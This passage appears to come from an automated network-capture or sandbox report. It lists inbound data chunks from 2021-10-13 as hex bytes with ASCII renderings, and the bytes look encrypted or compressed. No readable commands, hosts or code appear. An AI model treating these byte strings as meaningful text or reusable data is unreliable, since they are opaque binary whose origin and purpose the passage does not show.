2021-10-13 13:47:09 UTC	29	IN	Data Raw: 4e 59 5a e3 bc 36 9a 45 a8 26 87 8c eb 0e b7 6e 0c 3a 67 bb e1 c8 f5 8b fc 27 1b 91 32 60 b1 2c e2 71 e0 3c 91 41 d3 1a 62 59 b9 a8 08 bb 9c 56 5b d4 ec ef 48 9a 02 7b 6a ef 14 b9 7c d6 42 83 ac 07 46 d3 a7 e0 46 fe be 3f 7d 2f 25 a8 f2 51 57 3e 32 17 55 d5 de 61 54 54 41 1a 18 9f 38 12 13 7f 0f 58 57 d5 ca 88 76 04 4c bb d5 e3 ab d5 71 90 dd c9 a2 b0 14 25 c0 bd a8 10 11 63 e6 b3 2c 5c 66 c0 35 cd 1e 44 57 4c 4f 65 1d 2c f4 e5 cd 7d f1 21 ab ff d4 99 d8 e1 11 9a 01 26 e6 19 22 aa 33 64 34 a8 f9 9e bb c8 e2 dc 4a 69 05 1c db b7 7d 0f 6b 62 97 4d ae 30 f7 b6 c2 6e 81 d0 18 03 c7 b9 30 dd 2c cd 90 74 d9 b6 b5 8f 1f 6d 96 4b b8 cb bc eb f0 cd 66 4b b8 e9 ae b4 88 f8 ed a0 17 a4 8b 1b 3d 76 bb 9e e5 5f 8a fc 9a e4 fc 39 31 5e f2 84 24 a4 ed c9 51 b1 b1 66 54 Data Ascii: NYZ6E&n:g'2`,q<AbYV[H{j\|BFF?}/%QW>2UaTTA8XWvLq%c,\f5DWLOe,}!&"3d4Ji}kbM0n0,tmKfK=v_91^$QfT
2021-10-13 13:47:09 UTC	31	IN	Data Raw: 8e c7 bc e2 77 0f c3 3a 6f 0b 6b 2f 09 06 85 9d e7 be 17 ae 15 41 c8 dd 12 73 a3 85 0a b6 f0 93 05 d5 4b e7 a2 48 9e 72 25 f0 6a a5 ea 4b 22 99 cc 0c 00 97 80 6e 27 2d 51 76 06 ae 9e d5 4f da b6 17 55 fe 76 8c cd 52 9c 6f e4 c9 b0 1e fa 39 08 95 9e 70 ce a6 47 e0 7a 4c 99 8a e8 7e 04 54 96 8c ca 27 33 66 25 40 c0 de 7d 22 10 74 10 5f 1a 6e 6b a6 d5 bb 69 1f 45 ae c7 df bd b7 13 7c 92 1c 29 d3 e6 43 e6 e2 47 25 3c 57 68 04 9c 95 cb d9 8e 35 93 0f e8 4d eb 68 c4 30 e7 2e 26 d9 ca cc fe 66 e5 5f 85 ca fb 63 90 f0 01 b2 c9 52 a7 51 01 e9 0d b8 88 fa 93 53 0a ab 36 9c 38 82 ce a9 f5 de 7c de 44 04 99 d6 17 7b 6b ac a6 5a 82 24 9d 9c b1 b3 42 2e 02 ba f9 25 4f 18 d5 9d f6 d3 10 e7 11 28 38 b0 03 8f be 34 8b b5 06 f0 e1 30 f5 5c 62 2e 09 ef d8 27 0d 41 46 e2 35 Data Ascii: w:ok/AsKHr%jK"n'-QvOUvRo9pGzL~T'3f%@}"t_nkiE\|)CG%<Wh5Mh0.&f_cRQS68\|D{kZ$B.%O(840\b.'AF5
2021-10-13 13:47:09 UTC	32	IN	Data Raw: 00 77 a8 60 da 5c fe ab 16 64 45 ed be 93 2c 8a 35 26 a8 59 fc 03 20 70 b8 0b 3f 23 ae 9a d3 c9 87 c9 29 af 5c 06 8b d3 09 50 87 ba 23 aa 75 cd 98 0b 74 a3 69 3c ee 18 e5 bc 9f 3c a3 9b 77 e5 30 84 ee 85 cd d8 9c 31 75 70 ba d4 8e 1b 4b 97 88 c4 b9 42 b0 ee 84 fb 81 be 06 c0 89 c2 08 35 38 1c 50 0f fe 64 58 e5 55 e5 e1 44 36 2e c3 50 56 3d f4 e0 02 72 f0 7f c9 5c df 6b a3 97 4e fd d1 63 6e 7b 78 0f 6d d6 20 8b da 8a c7 41 14 10 1c a2 83 c0 ad 4a 57 8c 22 83 1f 41 15 6c 1e 42 ba 6d 47 1d 0d 0f 3a cb 18 d7 32 c6 13 9a ee 81 2a 09 85 35 4c bb 1e 1a 2e fc e2 6e 5c ef c0 88 07 ea 82 cb 8f a6 ee ff fe d1 fd d6 92 50 53 10 f8 01 21 3f 02 36 a3 fd b0 41 3c e0 eb 26 15 db c4 70 4b 33 67 9b a0 d4 62 a1 2c ac 7d d4 78 5a fc 88 48 d2 72 ae 0a 03 11 ad 0b e7 8a ac 64 Data Ascii: w`\dE,5&Y p?#)\P#uti<<w01upKB58PdXUD6.PV=r\kNcn{xm AJW"AlBmG:2*5L.n\PS!?6A<&pK3gb,}xZHrd
2021-10-13 13:47:09 UTC	33	IN	Data Raw: 65 66 78 cc 7d e5 b9 d0 96 09 41 70 e3 23 1e b6 69 70 75 b4 b9 9d 60 87 3a d1 52 50 92 33 e8 54 f8 c6 04 9c 6a b6 45 15 18 10 40 0e de ce ff 48 91 e5 1c cd 21 d0 42 80 00 b5 7e 5e c6 3a f5 61 24 01 8f 6f 79 9d 47 98 7c 32 5f 00 9e 2d ed 74 4a 8d f5 69 ac 83 06 c7 7f 6a ef 5f 4a 9f 56 45 eb fb ef b1 8d 3e 79 19 ff b8 e2 54 db f0 76 b6 85 80 7b 5b 7d 96 95 06 19 55 24 29 dd 4d 43 54 42 16 7f 9f da b1 a7 ca ed 76 4a 4c 53 4f a2 b4 d4 b6 56 f1 84 2b ce 91 22 f0 f9 92 23 d1 3d 53 98 77 9c 1f 61 7a ce 4d 87 a3 4b c4 a5 5c 73 f4 4c 4f 40 59 97 27 9a 2b e5 e3 a6 1c b5 9c 67 e7 19 af 14 93 c7 96 94 23 ab f0 08 bb a5 5e 33 d3 c8 29 3a 80 ce e2 27 53 9a b6 3b ea 02 ae 58 a5 15 51 b7 92 32 1b 1b 30 ae c6 96 ac 7d c3 a9 19 41 f0 4b 7f d8 83 c7 1c e4 66 7e 31 6b 17 ac Data Ascii: efx}Ap#ipu`:RP3TjE@H!B~^:a$oyG\|2_-tJij_JVE>yTv{[}U$)MCTBvJLSOV+"#=SwazMK\sLO@Y'+g#^3):'S;XQ20}AKf~1k
2021-10-13 13:47:09 UTC	34	IN	Data Raw: 36 9c 38 9e 59 46 d8 07 7c de 98 07 97 53 d7 0f 78 79 8e 95 4d ff fb b4 02 08 69 18 60 fa d8 e8 a2 a7 02 7d f0 ba 69 f5 e6 d5 68 da 2a 57 0b 9c d6 6e 09 f7 cf 38 a5 b4 ff 75 32 ef 54 67 e5 c4 86 96 a5 50 66 37 22 32 35 32 e0 68 bb 69 8a 92 28 94 31 80 54 a8 4a 89 0c 97 1e 7d 42 2b e6 26 87 9c 73 0e b7 6e 0c b4 0a bb e1 10 68 91 43 6b d7 43 7b 25 90 be fe 6f 69 81 69 31 69 e9 b9 c4 7a 0f b8 b5 2b c4 1c 0e 35 5b 4b 74 73 6f 65 a9 1c fe de e6 b2 f1 17 05 b1 e7 b6 7f 9e f0 e6 e1 eb ad ba 6f b7 0e f3 bd 93 07 17 6f 72 72 03 cc 8e ec 5c 43 57 d2 2c f2 5c 68 4f 5a 35 12 21 91 e1 91 89 e2 85 82 e5 3d 92 82 a3 c8 99 67 7d ac 32 ef 41 8b a5 6a f3 5c e5 87 ed 5c e5 f3 3b c6 48 6d e7 82 5a e5 7b 94 88 f0 4a 90 18 b4 41 3b 52 f1 73 65 af 6c 40 aa d6 61 36 a8 57 fd 93 Data Ascii: 68YF\|SxyMi`}ih*Wn8u2TgPf7"252hi(1TJ}B+&snhCkC{%oii1iz+5[Ktsoeoorr\CW,\hOZ5!=g}2Aj\\;HmZ{JA;Rsel@a6W
2021-10-13 13:47:09 UTC	35	IN	Data Raw: 42 6f b4 c0 d8 2d 83 35 fd 05 f4 6a 72 3b f1 de 96 dc 3d e1 72 11 92 3b 9e 2c 87 5f e5 b6 7c af 6c 20 ec be 76 f1 6c db ad 78 ad 92 17 42 69 21 3c dd b2 f6 27 48 4b 60 30 58 19 41 7a 60 f6 ad 76 7f 91 92 4c d2 0d e1 62 4f 56 41 1e 32 41 4d ac 75 fd e7 79 fe 35 c0 c8 4f 94 cd 12 b1 7a 18 e1 7a 05 e1 6c 3e 4d 13 bb 15 c9 35 aa d6 64 44 6f ad 8a 4f e5 1a a0 f7 f0 a3 42 91 88 7e eb 87 83 2c 24 f7 9b 8e b1 00 b1 9e 44 59 03 8b dd a2 27 ac 13 58 eb 4d 51 65 49 f6 0c e3 9e 01 24 7a 7b 3c 4d 62 c1 a8 c4 ef 10 ff 4b 5e 3c df fd 29 fa d3 4a f4 93 ff c9 84 49 89 0b 81 ac 35 79 35 d2 f0 bb 04 12 e5 56 5f 04 b6 57 7f e2 8b b5 51 98 03 bf 34 d7 f1 d7 a4 51 72 20 3a 61 49 0c bc 21 c4 8c 59 5f ca 7d d0 26 6f 18 69 75 8c 02 0f 92 de 00 6c 17 21 2e 6d 57 26 38 89 ca 2a 24 Data Ascii: Bo-5jr;=r;,_\|l vlxBi!<'HK`0XAz`vLbOVA2AMuy5Ozzl>M5dDoOB~,$DY'XMQeI$z{<MbK^<)JI5y5V_WQ4Qr :aI!Y_}&oiul!.mW&8*$
2021-10-13 13:47:09 UTC	36	IN	Data Raw: 3f 92 e6 26 bd a8 27 53 c8 9d 07 40 5e 65 45 b7 a7 5d cb 07 0c 9f bd fc c3 e1 d9 d8 b1 17 78 0c 0d e0 e4 34 ae 64 93 57 29 bd ed 9e 37 d4 23 dc 42 06 eb 49 71 c2 3e 6d b6 18 b2 f1 ca 6a 15 6d 9c 50 29 17 fd b1 90 47 5d cb 89 56 0a 44 1a 93 ed 7d 2c b3 68 be 38 31 84 32 74 c7 07 f3 a1 fa 1b f5 3f 8c 3c ad 20 80 b0 e0 51 3c aa e2 70 b2 59 70 50 44 f1 95 cb f6 dd 51 5c e9 e9 48 ca e5 72 e6 4d 5c 97 18 32 54 c7 fd d3 a3 69 63 72 a7 be 59 65 d4 ef a8 83 49 53 74 e7 32 03 c9 17 21 76 40 89 c2 8e af be 1e 91 29 64 c8 50 18 48 01 b7 3c 8b 64 ef 00 42 55 da 7b ce 46 ca fe 7c 8a e9 86 e6 d3 6a 55 da 21 7b 49 4a 71 33 a4 82 a3 1e 37 59 42 d5 3d 7b d9 ce 60 6c 48 9d a1 51 4f 79 5e 14 64 15 f5 a3 22 6f fb c0 1b 70 2f 42 f0 01 b0 32 c3 7e 5a 7d 0a d5 81 99 c2 a6 c0 51 Data Ascii: ?&'S@^eE]x4dW)7#BIq>mjmP)G]VD},h812t?< Q<pYpPDQ\HrM\2TicrYeISt2!v@)dPH<dBU{F\|jU!{IJq37YB={`lHQOy^d"op/B2~Z}Q
2021-10-13 13:47:09 UTC	38	IN	Data Raw: 2d 1b 2b 53 d6 74 da 89 b0 1a 23 17 2e bf 06 1b 15 d7 cf 9c c0 5f af 7d d2 57 57 0e dd 4a 6d aa be 37 1f c7 0d a2 61 d8 07 09 fa 46 07 35 fb d7 0f f8 18 d3 22 f1 67 d9 1c b5 e7 aa 85 18 52 bf 27 0e 4f d6 1b 5b 57 e8 9a 2a c7 37 84 24 1f 00 78 05 90 06 73 73 d0 55 61 66 09 8a 2b 53 60 bb 1c 81 96 26 2d 03 25 7b 5e 5d 0f e0 68 6e fa bd d1 fe 4a 34 80 54 f8 b3 4d 1e 77 f4 83 13 9d d0 34 4e 92 35 2b 4f 91 e4 f4 2b af e0 43 bb 04 31 4a d7 c0 ca 18 9e f9 c2 50 e4 3c c1 9a 7e cf 65 0f 51 7f a6 1a 97 d5 9f 9c b1 03 97 e7 90 7b 00 ef ce bc 1a c1 14 6b bb d2 b1 8d 30 e8 09 c7 ee 4d d3 6c 2c 32 74 58 bb 31 89 48 c4 78 4c e8 ab db ca 2d de fd 0c 07 7c 7f cf 68 b3 94 0a b3 b5 ab e9 8b a5 e3 d3 3d 26 ca 34 ac f4 0f 92 ba 90 51 cd 17 11 63 0e 9c f4 a3 99 bc 0e 31 ff 6b Data Ascii: -+St#._}WWJm7aF5"gR'O[W*7$xssUaf+S`&-%{^]hnJ4TMw4N5+O+C1JP<~eQ{k0Ml,2tX1HxL-\|h=&4Qc1k
2021-10-13 13:47:09 UTC	39	IN	Data Raw: 3f b3 02 da d6 32 22 d5 bd c1 40 f9 b4 36 4b b1 47 f4 22 c0 b7 10 52 52 b0 3a 2d 3f 0f 04 5b bc ff e8 1a 3b 0f af 04 d1 d6 b1 97 23 86 c2 6f 19 31 a2 18 2d 67 b6 1d c7 d3 10 2b 84 5f 66 fb 29 d6 44 b1 f9 34 31 52 69 4d 20 d2 f3 a8 2c fc c8 38 8b dd 39 30 1b cb 53 a0 a1 2c 4b a9 32 5e 19 d7 35 ce ae 7f f0 d4 4a f6 e9 52 53 be e1 25 1a 95 c9 71 7e 27 83 77 2e 17 c9 4c 43 cc 02 3a 41 38 35 71 b1 8a 08 68 1a 1a b5 3e cf 87 51 18 61 04 58 6d 09 38 f0 78 33 37 b5 2a 6e d4 01 56 ae 0e a7 69 34 90 fe 9a 4e b8 c7 a3 7c 59 78 f4 7d f4 8e eb ef e0 eb 27 49 e8 8f f3 00 70 ef 9e 1b 75 95 fb 18 6a e9 31 a1 1d ce fd 4b 0d ef 94 f0 14 26 1f 68 63 0e df cb d2 a1 86 27 ea a8 33 63 2d b1 8c f9 c8 47 84 cc 8c ac d0 41 f4 32 47 26 ee 95 20 84 22 d8 f0 11 dd 5d f9 2c b5 2c 8c Data Ascii: ?2"@6KG"RR:-?[;#o1-g+_f)D41RiM ,890S,K2^5JRS%q~'w.LC:A85qh>QaXm8x37*nVi4N\|Yx}'Ipuj1K&hc'3c-GA2G& "],,
2021-10-13 13:47:09 UTC	40	IN	Data Raw: 9e 99 9f 77 04 5b f2 b4 09 4e f0 d9 ae c9 27 c8 00 0c 22 b7 fa 93 93 0f bb ac 3e c5 70 3b e4 14 f5 df 1f 54 d1 e1 2a f2 fe 26 20 02 23 41 2d ce c2 24 4e f8 8a be 98 c1 c7 27 8f c4 53 c4 bd 71 76 23 4a 85 9c 2f 5c 80 03 b1 7e de d4 3f 50 68 dc 43 30 25 2c ae 1a 7b 84 71 bb bf f0 bc 66 2d 3e 33 92 36 62 93 65 e6 70 c1 53 7d 6d fb 66 16 cf ad 74 ad f1 08 b5 bd f1 a1 69 af 61 a0 dc 2f 56 94 b0 cb c1 37 66 a2 12 54 1e a6 b6 df 9d 34 8a ee 75 29 8b b0 d9 e2 8e a3 e0 d6 54 59 0c f7 e0 41 1f 42 a6 dd a0 11 73 17 3c 1e 5d e3 39 a2 dc 79 a4 ef 84 3f 75 4a b5 d8 27 49 e2 05 44 0c fc d3 fd e9 fc d5 2b 7a 0a 9e 22 f7 8e 42 d8 70 0b 9a f6 b4 73 eb 2b 72 9b 18 6c 65 46 53 54 77 c3 df 94 7b d7 14 92 b5 32 2f 01 bb 8e cb e3 e2 fb ee 97 21 a9 37 f2 f1 a1 b7 6a b4 a2 ab ad Data Ascii: w[N'">p;T*& #A-$N'Sqv#J/\~?PhC0%,{qf->36bepS}mftia/V7fT4u)TYABs<]9y?uJ'ID+z"Bps+rleFSTw{2/!7j
2021-10-13 13:47:09 UTC	41	IN	Data Raw: 5b 23 95 34 d7 74 d6 1a 58 fa 18 c2 63 dd a7 69 83 44 91 27 66 1e fa c0 3e 3f 68 07 75 b3 b8 55 9f 1a 1d d1 d9 4e ea 30 94 d2 d2 00 fd dd 2a b3 66 ed d5 04 bc 06 99 aa fd 63 ab 59 21 a2 ac a6 03 20 ee 3c 23 81 4d ca 85 fb 7f 4a 5a 78 6f ac 28 ce b7 25 5e c2 da ec e6 c1 26 3a b5 a7 4f a6 34 00 b6 13 cf 0b 8b df bd e1 2f 15 6d d9 2c 28 df d5 af 3e c1 50 e4 33 55 b7 2d 6b b5 11 a4 1c 8e 81 7a 1b b2 3b aa 8b 36 39 22 fb e2 e1 a8 ca 32 17 b8 1b 4e 7c df 09 cc f4 d5 9d 68 d7 eb d9 d2 45 0d 4c 7f 78 b1 b2 1c 17 d2 b9 55 de 40 7d 8e 95 16 08 bd b8 a1 68 56 cc ff b3 1a 99 6a 9f 67 fb da 25 a3 f7 64 5e 67 ff 90 0c bd 9b af 87 e3 9a 67 b4 0c fe 93 88 01 6c 0d 10 77 d2 ea 52 65 e7 ff f2 b4 6a b4 f0 ff b7 02 e3 1f 24 31 c5 e8 3f ce 56 8d c8 11 ea bd b6 ca 94 c2 5f 49 Data Ascii: [#4tXciD'f>?huUN0*fcY! <#MJZxo(%^&:O4/m,(>P3U-kz;69"2N\|hELxU@}hVjg%d^gglwRej$1?V_I
2021-10-13 13:47:09 UTC	43	IN	Data Raw: 6d 81 89 3a 0e 88 16 34 09 c3 1c 09 a8 ed ae 96 55 a3 9e 9d 6d e9 d3 61 dc 7b a6 df 7e a2 e6 3b 0c f8 74 87 fe a2 82 f5 c4 97 89 6a 62 5b 79 e2 a6 b7 0c 62 80 0a 66 65 c5 dd 10 f4 c1 f0 c7 df ec 45 ef ea 6c 7b 07 d3 b7 89 8e ca b8 69 9e c6 0e 21 2d 21 17 df b5 90 af c4 09 f1 b9 62 a5 7f fe d6 b8 3b 41 40 36 3a 79 67 e9 3d ef 3d ba 55 60 f7 3d df fe 36 9b 3c fc b7 64 0d 4f af 76 1f 41 ad 0a 44 8e fc c6 e7 ca 6b aa 28 a9 be 15 d6 94 1d 6a f0 2e d8 84 88 7f 28 52 18 ab b7 96 c5 f8 f7 79 3b 1c 9d cf ed 42 be 17 02 53 d1 4c 69 28 09 00 92 f6 74 b1 d3 ad bb be 63 c2 e7 32 65 22 d8 70 b9 a6 9e 76 34 be 76 e9 74 60 b1 b0 40 3e ca f8 51 32 7a 98 03 8e 6d 68 e9 a2 4c e9 74 eb ca b6 b8 3d 1e fa 4f 64 43 e7 d1 8c db cd e0 7a e3 5c b0 81 4f c3 5a b3 7b b6 1c 3a d9 9b Data Ascii: m:4Uma{~;tjb[ybfeEl{i!-!b;A@6:yg==U`=6<dOvADk(j.(Ry;BSLi(tc2e"pv4vt`@>Q2zmhLt=OdCz\OZ{:
2021-10-13 13:47:09 UTC	44	IN	Data Raw: a7 3f bd 5d 36 05 91 02 1b c8 68 fc f4 9d 66 0b cf b2 5e a7 e3 85 fc eb c5 b6 d2 c6 c8 61 d1 0e 17 91 9a 1e eb 42 6b ee 5d 38 1f 72 9f 31 8f a8 0d 98 5d 19 7e fb 02 68 14 38 f2 5a 18 d3 26 52 bb 15 9a f6 95 18 e6 2c e3 57 9a 30 d4 d5 bd 7b 30 73 73 43 61 d1 82 a0 78 5c ce e2 27 53 9a b6 3b fc ff f7 1a 92 72 b5 24 39 46 08 b3 35 eb cd c7 ec d0 a5 f0 9d 3b 79 3e 73 d9 cf ff f8 3c 98 2c 47 85 df 18 26 3b 60 ee bb a3 9e ce 45 eb 7e b7 6d 57 f6 53 73 ba ad b3 f6 58 2a db a2 3f ed a1 fa 90 3a 9b 06 59 45 e3 0d c9 14 24 f2 cf 4e a6 d9 8f ef d8 f1 8f 2e 9f 6a ce e4 28 dd 47 81 b0 d7 bf 9d 93 9b 01 78 46 6e ef e9 aa d7 eb ec b4 fa f8 55 9b 15 5a ba 4c c0 77 70 89 19 b2 f2 86 5d 64 16 55 c0 3a b5 24 36 59 18 79 b6 ff 7a df 63 dd 2c f4 03 f4 73 b4 9d 81 f3 4d c5 3c Data Ascii: ?]6hf^aBk]8r1]~h8Z&R,W0{0ssCax\'S;r$9F5;y>s<,G&;`E~mWSsX*?:YE$N.j(GxFnUZLwp]dU:$6Yyzc,sM<
2021-10-13 13:47:09 UTC	45	IN	Data Raw: 4c 99 2b 03 7f 04 54 86 94 ca 27 07 66 2d b4 cc de 7d f6 b3 78 4c 5c 06 3a 22 a6 1f 70 d7 5f 20 9c 0e de c8 c2 d8 c2 07 8f d6 a4 65 60 bd 05 d8 5a 7d 4f 69 55 11 e5 22 b1 b0 dc 8f 77 d7 b0 30 94 16 2d 27 22 70 0c dd 36 6c 7d 0d e7 45 c7 a5 78 4b 9e 19 7d 12 97 b7 f0 ff 17 5f 51 35 b9 24 db 89 20 d3 42 3f 07 13 a9 25 f8 83 8f 2f f9 99 52 d7 8c bc 2f 56 a9 e7 b5 da da a9 b1 71 fc 6a 54 bd 4d 4e 4a b3 ad 99 ad 17 e6 be b1 e1 4f 99 27 a9 6f bb 16 07 72 25 50 a1 b5 99 f6 84 62 b3 1e fa 3b d7 1b 73 dd 24 df 33 a6 e2 32 88 6c ec 3e b9 df c5 72 c8 7f ab a8 4a 49 0e 3b 09 8b 03 19 10 cd 5b e1 d9 7e 0d 61 b4 4b 76 52 db 9c 80 83 f2 ae e3 45 7f 4d 5c f5 c7 8c b5 d4 5b cf 97 16 b9 42 5d 79 7c ba 9e 5e da 08 3b 7f 16 fa 32 7b 6b ef 1c fb cc 82 1c d8 70 8a ec 4e 3e b9 Data Ascii: L+T'f-}xL\:"p_ e`Z}OiU"w0-'"p6l}ExK}_Q5$ B?%/R/VqjTMNJO'or%Pb;s$32l>rJI;[~aKvREM\[B]y\|^;2{kpN>
2021-10-13 13:47:09 UTC	47	IN	Data Raw: 78 fe b7 6e 28 e7 44 65 0f 92 3d f7 88 7f 51 a8 b6 d7 05 d6 30 2b 78 ba 69 8d 8c 4a e6 79 a5 16 68 3c 65 57 bd 8c a3 4a 8e a5 68 3a c0 b5 1f 96 46 e9 d9 a1 6d a8 63 93 21 1b 75 d3 d8 0a 6f 2b 3e b0 e8 0a 0a da 5d 7d 6c 0d 9a 0d a1 d8 1a da 50 55 cb a0 32 4b f0 5d 62 89 25 f4 82 46 0b 0e d7 a4 f1 65 bf 0e 0f ae 08 0a f4 b4 02 ad d5 f7 c5 fe 5a 97 18 2d e4 f9 40 6f b0 bb 1e 0e 6d 5d 37 39 53 84 a2 37 fa b2 f1 44 e3 a3 fd 5b 92 c6 46 30 7c f8 54 01 38 a2 0b 8a 30 63 80 02 a1 3a d7 d9 00 7e ed ad 7d 87 e1 f2 3c 6d 92 aa ca 16 e3 c4 e7 d9 4b f3 72 97 25 20 b3 02 26 93 e2 49 7f eb 33 a9 5b 14 00 00 e5 4f a5 ba ad cf 88 49 d6 3f 0f 21 89 08 f6 c4 18 a8 17 f2 ee 29 49 c5 ca 9d 10 e0 e0 95 90 1a 40 10 81 a4 95 ad 1a 32 39 dd 3d 8c ff 1b 08 44 f5 c2 ad fc 9d 55 38 Data Ascii: xn(De=Q0+xiJyh<eWJh:Fmc!uo+>]}lPU2K]b%FeZ-@om]79S7D[F0\|T80c:~}<mKr% &I3[OI?!)I@29=DU8
2021-10-13 13:47:09 UTC	48	IN	Data Raw: 72 bc 14 62 c4 8b 71 75 ac e4 cc 9d 38 ab 55 af ee b2 8a 46 8e e6 c2 7d 82 4b bf 9e e7 7c 8f 5c a4 a7 ba df 29 46 d7 e9 7a 0a fe 75 b7 a7 da ed 1e c3 29 5f a7 0b 04 3c 49 2a be 5c 21 0c 1c 15 43 ae c2 10 11 17 03 d6 96 78 66 05 06 1f da 88 23 4b b1 df 9a 32 55 97 89 26 b1 ac 36 9b a2 33 d7 39 c4 32 98 67 e7 4a 24 7a 5b 9a 0d da e5 51 2a ce bc a1 4d d7 de c8 22 d6 b5 8a 16 77 02 97 03 9e 18 33 a2 12 ba 37 d9 c3 b3 fc 7c d5 d0 d0 d0 77 d9 1b f1 f6 24 9d a0 c0 6e e4 44 e8 f0 d5 66 a0 74 54 02 d7 54 31 bf f0 17 c1 65 17 6d fb b5 3a 34 25 b5 d4 51 47 f4 c4 ba c6 35 76 7c 4c 0a 79 fa 90 3b 8e f3 21 06 4b 49 61 e3 af 34 1b 0a af d0 54 f3 7e 85 95 f0 98 ed 08 e6 1a 54 ef d4 71 16 35 0a 50 ff 8b 28 47 46 af 49 49 5e 1c 6f c2 ff 91 1c 93 16 d3 cf 4d 38 c8 fa e4 f5 Data Ascii: rbqu8UF}K\|\)Fzu)_<I\!Cxf#K2U&6392gJ$z[QM"w37\|w$nDftTT1em:4%QG5v\|Ly;!KIa4T~Tq5P(GFII^oM8
2021-10-13 13:47:09 UTC	49	IN	Data Raw: a9 ca 3c 6d 67 1b 30 62 b5 65 91 d2 a1 4c 33 00 9c b4 99 e1 9c e1 05 3b 08 75 4f 39 47 65 7a 6b 8f 9f 89 9d da 7a 87 27 cf f1 57 68 8e 97 55 47 c1 a2 42 76 41 cf 37 a6 8e fa 97 f5 05 2c 31 1e fb 30 23 0d bd 34 54 b0 0f 57 08 05 3e 64 bc 60 ac 33 7a 4f e2 41 94 c5 75 0b 83 ec 93 8c a3 02 47 b8 54 46 b8 f6 26 8f a9 4d 15 e5 21 c0 7a 3d d1 3e dc 12 d4 f9 cc 4f dc d2 e2 12 2a c2 7a 3f 5f 8f d2 ab 64 49 14 52 5d be 27 84 b8 d6 98 9e ca d8 32 52 bb a5 04 fd 0f 49 c5 51 77 a7 c9 ee 8d 1a e5 18 c5 f4 bf c4 f3 55 e8 19 b8 5c 1d d2 fa 62 a6 99 53 b5 06 06 2f 80 a4 b4 99 f6 57 64 be be c6 93 b5 56 4e 2b 74 37 2d e6 6e bf 9a 94 12 c1 e8 34 c9 17 4b 7c ab 07 2f 10 04 6a e1 e8 6d 95 85 c2 f0 e6 74 99 48 c3 0c 18 d7 ba e1 29 fe 0e f4 68 28 3f 40 5f 15 2e 62 84 15 3c 91 Data Ascii: <mg0beL3;uO9Gezkz'WhUGBvA7,10#4TW>d`3zOAuGTF&M!z=>O*z?_dIR]'2RIQwU\bS/WdVN+t7-n4K\|/jmtH)h(?@_.b<
2021-10-13 13:47:09 UTC	50	IN	Data Raw: 89 a8 36 92 d2 3d f7 6a 2f 84 06 e4 96 e5 be b9 15 2a 3b 55 29 85 8d d7 95 63 ae 7c 07 90 17 87 19 5d 4a 9b 72 38 2f 94 5a 52 d2 78 ad 10 04 a1 ec 4c 51 25 a3 df b1 7a 5a ed a7 44 e0 cc 84 fb e9 a2 e3 cc 20 cc 25 f4 4d b2 1e fa df 4d 0e cc 3a ce 2a 46 e0 7a 6e 71 ff ae b8 81 a7 34 7b b6 8e 0b ad a8 7f bb 5d 7d 8c 85 65 43 db 05 70 2e 26 33 7f 12 4f cb 51 53 5b 55 a1 38 74 17 51 d8 1d 91 c9 15 d8 de 6f 16 b0 96 fb cd c3 cb 22 0d cb 6c 01 bd ab 47 16 fd fc 0b cb d7 8f 22 8b 45 66 e5 dc 2b 9c cf 79 7d 9c d0 34 a0 3b a0 50 16 c9 bf 2d 0e 24 ee 61 2e 54 c9 9c 38 ca cc 4e 6e ff 94 63 36 c0 91 39 df 65 7b 41 5a ea ad d4 a6 25 56 59 fe ce fd ad b0 fb 8e 9b fa 24 2b db 65 fd 12 28 97 8b 91 45 a7 90 53 38 92 36 c1 c4 5a 4b 1a 32 0d bd b3 aa fb c4 86 1b a3 c1 88 c8 Data Ascii: 6=j/;U)c\|]Jr8/ZRxLQ%zZD %MM:Fznq4{]}eCp.&3OQS[U8tQo"lG"Ef+y}4;P-$a.T8Nnc69e{AZ%VY$+e(ES86ZK2
2021-10-13 13:47:09 UTC	51	IN	Data Raw: 9b 25 a4 21 11 5a 05 6f 3d 4f 02 85 ae 5c bb c9 f7 22 21 f3 14 f0 8e 35 63 cd d3 89 ad 5b e5 89 12 ac 6b 11 46 79 65 b5 eb 22 9b e3 d6 46 46 ff f1 a0 4a 68 85 4a fb 05 5c 9d 9f 23 a5 db 4a 25 71 a1 84 67 4f 08 55 c4 1a 62 02 79 f8 e8 f6 48 b2 34 20 80 c2 6c 84 fc 0d de 64 a5 a8 97 79 be a8 30 cd 3c c6 f4 e9 89 f1 53 cf 60 88 17 72 60 0a 6e 18 56 b3 6c a6 2d 42 0d 72 4a 70 1a cb 82 4a d7 1c f8 c5 72 11 4b 5c 33 35 7b 41 d9 dc e4 01 05 e4 91 d8 66 0f 13 de 38 87 de a1 82 f5 e2 5e 8c d2 2e 5b 55 e1 a6 b7 71 22 c1 34 d4 29 15 08 b1 86 36 f3 78 60 fd f7 bd 9b a5 7b 07 7e 6b 0b 51 fd 7f 6f 6e 35 99 87 71 20 bc 8e 72 7f 97 53 14 14 cb 54 0d ee d8 53 84 47 7a bb 26 f9 ff 3b 78 50 eb 45 45 aa a3 33 28 58 f9 c7 d6 48 14 c5 2a f1 1b fb 4e 4a 56 0c 4d ba 89 f4 cf b6 Data Ascii: %!Zo=O\"!5c[kFye"FFJhJ\#J%qgOUbyH4 ldy0<S`r`nVl-BrJpJrK\35{Af8^.[Uq"4)6x`{~kQon5q rSTSGz&;xPEE3(XH*NJVM
2021-10-13 13:47:09 UTC	52	IN	Data Raw: 14 72 4c ef a7 1c fa 94 d0 7e 63 ce 89 c8 a0 3b e3 ce 1f 97 bc d6 80 ba 40 92 59 81 d9 44 82 04 0a 95 1e e8 19 4f 46 a8 29 fa 74 0c 22 91 69 89 25 46 1e bc d2 0e 34 62 87 96 57 c1 ec 81 75 f3 20 08 14 0c 99 92 b0 0f 51 f4 a5 37 9c 29 60 0b 38 c7 ba f5 fa 7b 69 2f cf b4 5a 85 49 83 fb e2 24 8d 4f d3 ea ff be 5a f4 d7 72 6f 34 41 1b 61 ef 16 92 90 06 47 df c1 1c 1e 37 4e d9 97 7c 83 37 e2 e7 f1 22 27 94 3c f6 d2 2a e3 79 2a 49 84 dd 12 45 c8 14 58 d9 51 cd 10 77 ea 9a 1e f2 a0 99 bc 7c 5c 25 7b dc b4 94 c0 b4 98 a5 1a 90 9b f4 ac c2 64 d4 37 71 5a 04 85 65 98 64 dd 8f a2 93 96 4e 72 57 52 84 1b 3c c9 45 fc e6 40 0d 35 6f 99 0a 5b b1 3b 14 90 2f 31 a0 91 f3 a2 5c ff 38 46 a6 15 89 b2 c2 4b 31 a7 07 84 8e ee 36 6b fa 4e 4b 06 7b bf 66 2d ba e9 5a 0c 47 2d 5c Data Ascii: rL~c;@YDOF)t"i%F4bWu 